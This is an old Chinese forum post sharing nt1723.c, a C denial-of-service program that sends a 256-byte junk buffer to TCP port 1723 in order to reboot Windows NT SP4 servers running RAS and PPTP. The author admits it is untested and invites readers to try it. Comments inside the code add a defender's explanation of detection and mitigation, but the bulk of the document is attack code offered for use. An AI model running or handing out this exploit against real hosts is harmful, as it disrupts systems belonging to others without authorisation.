发信人: zer9()
整理人: williamlong(1999-09-28 22:15:24), 站内信件
下面的程序可远程重启动安装了RAS&PPTP 的winNT sp4.
(port 1723 open)
不过我是根据弱点的描述写的,没有试过,
if(我的理解&&弱点描述)
success!;
不论成功与否,tell me ,please.
[email protected]
----Cut Here------------------------------------------------
/* nt1723
* rem0te reb00t winNt sp4 with RAS&PPTP
* test on slackware 2.0.34
* cc nt1723.c -o nt1723
* b y
* z e r 9
* [email protected]
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
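#define FLOOD_PORT 1723 /* TCP port of the PPTP control connection */

/*
 * Opens one TCP connection to FLOOD_PORT on the host named in argv[1] and
 * writes a single 256-byte buffer filled with 'a', then closes the socket.
 *
 * The bytes are not a PPTP control message. The accompanying post claims that
 * Windows NT SP4 with RAS and PPTP installed reboots on such input, and the
 * author states that the program was written from the advisory text and never
 * tested.
 *
 * Defender's view: the traffic is a control connection to TCP 1723 whose first
 * bytes do not parse as a PPTP header, so a listener that validates the length
 * and magic-cookie fields before acting on a message rejects it, and a network
 * sensor can flag it on the same basis. Restricting TCP 1723 to known VPN
 * peers and applying the vendor fixes removes the exposure.
 *
 * Returns 0 after the buffer was handed to the socket, -1 on a usage,
 * resolution, socket, connect or send error.
 */
int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *nt;
    struct in_addr Target;
    char sendbuf[256];
    int s;

    printf("nt1723 by zer9 mailto:[email protected] \n");
    if (argc != 2) {
        /* argv[0] may be NULL when argc is 0, so fall back to a fixed name. */
        printf("usage: %s <Target>\n", argc > 0 ? argv[0] : "nt1723");
        return -1;
    }

    /*
     * Name lookup first, dotted-quad parsing as the fallback. The copy is
     * bounded by the destination size and only taken for IPv4 results, so a
     * resolver answer of another family cannot overrun Target.
     */
    nt = gethostbyname(argv[1]);
    if (nt != NULL && nt->h_addrtype == AF_INET &&
        (size_t)nt->h_length == sizeof Target.s_addr) {
        memcpy(&Target.s_addr, nt->h_addr_list[0], sizeof Target.s_addr);
    } else {
        Target.s_addr = inet_addr(argv[1]);
    }
    if (Target.s_addr == INADDR_NONE) {
        /* Neither call sets errno, so perror() would print an unrelated text. */
        fprintf(stderr, "%s: cannot resolve host\n", argv[1]);
        return -1;
    }

    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0) {
        perror("socket");
        return -1;
    }

    /* Zero the padding bytes of the address before filling it in. */
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(FLOOD_PORT);
    sin.sin_addr.s_addr = Target.s_addr;
    if (connect(s, (struct sockaddr *)&sin, sizeof sin) < 0) {
        perror("connect");
        close(s); /* the descriptor was leaked on this path before */
        return -1;
    }

    /*
     * The buffer is completely filled and has no NUL terminator, so its
     * length must come from sizeof; strlen() would read past the array.
     */
    memset(sendbuf, 'a', sizeof sendbuf);
    if (send(s, sendbuf, sizeof sendbuf, 0) < 0) {
        perror("send");
        close(s);
        return -1;
    }
    printf("flooded\n");
    close(s);
    return 0; /* a bare "return;" leaves the exit status unspecified */
}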